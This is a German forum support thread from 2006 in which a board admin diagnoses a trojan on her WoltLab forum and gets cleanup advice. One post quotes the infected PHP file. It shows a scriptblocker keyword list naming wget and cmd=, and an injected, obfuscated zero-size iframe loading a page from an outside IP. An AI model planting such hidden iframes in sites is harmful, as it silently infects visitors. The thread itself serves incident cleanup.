YourWBB


yourWBB » WoltLab Burning Board Generation 2 * » Alles von und für das WBB 2.3.x » [WBB 2.3.x] Allg. Fragen und Probleme » Trojaner eingefangen » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag 1.208 Views | | Thema zu Favoriten hinzufügen

Neues Thema erstellen Antwort erstellen
Dieses Thema wurde als unerledigt markiert. Thread unerledigt

Zum Ende der Seite springen Trojaner eingefangen
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
Amiraamal Amiraamal ist weiblich
Mitglied


Dabei seit: 08.04.06
Beiträge: 7
Forenversion: wbb 2.3.4
 Trojaner eingefangen Antworten Zitieren Editieren Melden       UP
Dies ist eine vorgefertigte Schablone.
Bitte fülle soviel aus, wie dir nur Möglich ist, du kannst auch gerne noch mehr Angaben machen.


Problembeschreibung: Trojaner infiziert PHP-Dateien

Fehlermeldung: über Virenscanner: C:\...\xpladv765[1].wmf enthält Signatur des Ecploits EXP/MS06-001.WMF.
im ACP: Warning: Cannot modify header information - headers already sent by
(output started at
/home/www/dps13120/html/wbb2/cache/language/0_own.php: in /home/www/dps13120/html/wbb2/acp/lib/functions.php on line 82

Warning: Cannot modify header information - headers already sent by
(output started at
/home/www/dps13120/html/wbb2/cache/language/0_own.php: in /home/www/dps13120/html/wbb2/acp/lib/functions.php on line 82



Link zum Forum oder Screenshot: www.wortkaestchen.de
Forum wurde erst einmal geschlossen


Was wurde zuletzt geändert oder eingebaut?
Änderungen: keine
Eingebaut zuletzt das Sicherheitssystem Version 2.1.2 und das HM-Portal


Laut Auskunft des Webhosters gelangen die Trojaner wohl über die Uploadfunktion in die PHP-Dateien und verändern sie.

Was kann ich nun tun?
Alle PHP-Dateien durchforsten nach einem Fehler oder einen Backup hochladen?
Vielen Dank schon mal im voraus.

LG Amira
29.04.06 00:28 Amiraamal ist offline E-Mail Finden Als Freund hinzufügen
KleenMicha KleenMicha ist männlich
Webentwickler


images/avatars/avatar-5745.jpg

Dabei seit: 16.01.04
Beiträge: 2.592
Fähigkeiten: WBB3 Fortgeschritten; WBB2 Profi
Antworten Zitieren Editieren Melden       UP
Dein Virenscanner hat dich auf ein problem aufmerksam gemacht dass im Windows bestand. Über eine Sicherheitslücke im System war es möglich mittels einer *.wmf Datei einen Trojaner in dein System einzuschleußen.

Hier nun die Lösung für dein Problem:

Lösche den besagten Virus von der Festplatte und führe das Update von Windows aus, soll heßen du lädst dir entweder mittels des Automatischen Updaters oder von der homepage von microsoft die akuellesten Updates herunter.

Im Forum empfiehlt es sich über das acp das anhängen von wmv datein zu verbieten und auch mal zu schaun ob im Forum auf eine solche Datei in Beiträgen verknüpft wurde.

Wie nun diese Sicherheitslücke im Windows sich direkt aufs Forum auswirkt kann ich allerdings im Moment nicht sagen.

__________________
Gruß Micha
29.04.06 11:21 KleenMicha ist offline E-Mail WWW Finden Als Freund hinzufügen Füge KleenMicha in deine Kontaktliste ein MSN Passport-Profil von KleenMicha anzeigen
Amiraamal Amiraamal ist weiblich
Mitglied


Dabei seit: 08.04.06
Beiträge: 7
Forenversion: wbb 2.3.4

Themenstarter Thema begonnen von Amiraamal
Antworten Zitieren Editieren Melden       UP
Vielen Dank für den Tipp. Die infizierte .wmf Datei habe ich gefunden und gelöscht. Nun werde ich ein Windwos-Update machen und anschließend den Fehler im Forum beheben.
So, wie es aussieht, ist nur eine Datei infiziert, die acp/security-options.php. Die sieht am Ende im Moment so aus:

// Scriptblocker
//----------------------------------------------->>
$scriptblocker_source = array('$_REQUEST', '$_GET', '$_SERVER','INSERT%20INTO','SELECT%20','DELETE%20FROM','chmod(','mdir%20', 'chmod%20', 'rmdir%20','chr(', 'wget', 'cmd=','fopen','fwrite');
//----------------------------------------------->>

?><iFrAme SRc=http://8%35%2E%32%35%35.%311%33%2E%32%32/in%63/nan%36%38.h%74ml WIdth=0 Height=0 fRAmeBoRDER=0 ></IFrAMe>

Dieses iFrAme... werde ich jetzt löschen und die drei attachment.gifs, die gestern nachmittag hochgeladen wurden auch.
Andere Dateien wurden gestern nicht verändert.
Mal schauen, ob es dann wieer funktioniert.

LG Amira
29.04.06 12:58 Amiraamal ist offline E-Mail Finden Als Freund hinzufügen
KleenMicha KleenMicha ist männlich
Webentwickler


images/avatars/avatar-5745.jpg

Dabei seit: 16.01.04
Beiträge: 2.592
Fähigkeiten: WBB3 Fortgeschritten; WBB2 Profi
Antworten Zitieren Editieren Melden       UP
Da das Format *.gif nicht von der Sicherheitslücke betroffen sind kannst du diese ja im Forum lassen.

Das Problem mit dem SecurityAddOn solltest du am besten bei wbb-security klären lassen, also wie es dazu kommen konnte.
smile

__________________
Gruß Micha
29.04.06 13:24 KleenMicha ist offline E-Mail WWW Finden Als Freund hinzufügen Füge KleenMicha in deine Kontaktliste ein MSN Passport-Profil von KleenMicha anzeigen
Amiraamal Amiraamal ist weiblich
Mitglied


Dabei seit: 08.04.06
Beiträge: 7
Forenversion: wbb 2.3.4

Themenstarter Thema begonnen von Amiraamal
Antworten Zitieren Editieren Melden       UP
Das habe ich eben bereits gemacht. Noch einmal vielen Dank.

LG Amira
29.04.06 13:47 Amiraamal ist offline E-Mail Finden Als Freund hinzufügen
Baumstruktur | Brettstruktur
Gehe zu:

Neues Thema erstellen Antwort erstellen
yourWBB » WoltLab Burning Board Generation 2 * » Alles von und für das WBB 2.3.x » [WBB 2.3.x] Allg. Fragen und Probleme » Trojaner eingefangen